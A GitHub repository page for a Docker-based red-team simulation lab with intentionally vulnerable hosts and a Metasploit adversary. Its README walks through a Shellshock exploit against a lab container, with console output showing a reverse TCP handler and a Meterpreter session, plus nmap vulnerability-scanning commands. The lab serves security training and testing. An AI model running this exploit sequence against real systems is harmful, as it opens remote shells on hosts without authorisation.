Skip to content

cyberpacifists/redteam

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

76 Commits

docker

docker

 
 

env

env

 
 

src

src

 
 

.gitignore

.gitignore

 
 

Pipfile

Pipfile

 
 

Pipfile.lock

Pipfile.lock

 
 

README.md

README.md

 
 

docker-compose.defenders.yml

docker-compose.defenders.yml

 
 

docker-compose.yml

docker-compose.yml

 
 

Repository files navigation

redteam

Red Team simulation

Components

  • Postgres database
  • Vulnerable hosts:
    • Apache httpd vulnerable to shellshock
    • DVWA (Damn Vulnerable Web Application)
    • vsftpd with an infamous backdoor
    • wordpress vulnerable to CVE-2016-10033 (plus mysql-5)
  • Metasploit RPC api (red team worker)
  • Python director (red team director)
  • Metasploit console (for debugging)

Requirements

  1. Install docker and docker-compose

Usage

  1. Start defenders: docker-compose -f docker-compose.defenders.yml up -t 2
  2. Start the adversary: docker-compose up --build -t 2

Development

Coding

Use one branch per feature so we can merge in small change increments: git checkout main && git pull && git checkout -b my-branch-name

Using your local python

You should normally use docker-compose up instead of running your own python, but if for some reason you need local development: You should decide on which campaign and which adversary to run. Feel free to change the defaults in src/tools/settings or use environment variables

pip install --user pipenv
cd redteam/src
pipenv shell
pipenv install --dev
python -m planner

Manual use of metasploit

If you want to debug the state of the database or perform manual actions in metasploit, you can connect to the msfconsole by docker attach redteam_msf_1

Remote code execution exploiting Shellshock

Example attack

Scan the hostname "target2"

> db_nmap target2

Check that the host is now in the database

> hosts
Hosts
=====

address     mac                name                               os_name  os_flavor  os_sp  purpose  info  comments
-------     ---                ----                               -------  ---------  -----  -------  ----  --------
172.19.0.3  02:42:ac:13:00:03  redteam_target2_1.redteam_default  Unknown                    device

Check which services are now in the database

> services
Services
========

host        port  proto  name   state  info
----        ----  -----  ----   -----  ----
172.19.0.3  80    tcp    http   open

Let's assume you expect the host to be vulnerable to shellshock, let's exploit it:

> use exploit/multi/http/apache_mod_cgi_bash_env_exec
> set RHOSTS target2
> set TARGETURI /cgi-bin/stats

Run the exploit:

> exploit

[*] Started reverse TCP handler on 172.19.0.6:4444 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (976712 bytes) to 172.19.0.3
[*] Meterpreter session 1 opened (172.19.0.6:4444 -> 172.19.0.3:60846) at 2020-11-04 12:52:22 +0000

meterpreter >

Profit!

Vulnerability scanning 
  mkdir -p $HOME/.nmap/scripts && wget -O $HOME/.nmap/scripts/vulners.nse 'https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/vulners.nse' && nmap --script-updatedb
  nmap -sV --script vulners  --script-args mincvss=6.0 target1

About

No description, website, or topics provided.

Resources

Readme
Activity
Custom properties

Stars

0 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

1 tags

Packages

No packages published

Contributors 2

  •  
  •  

Languages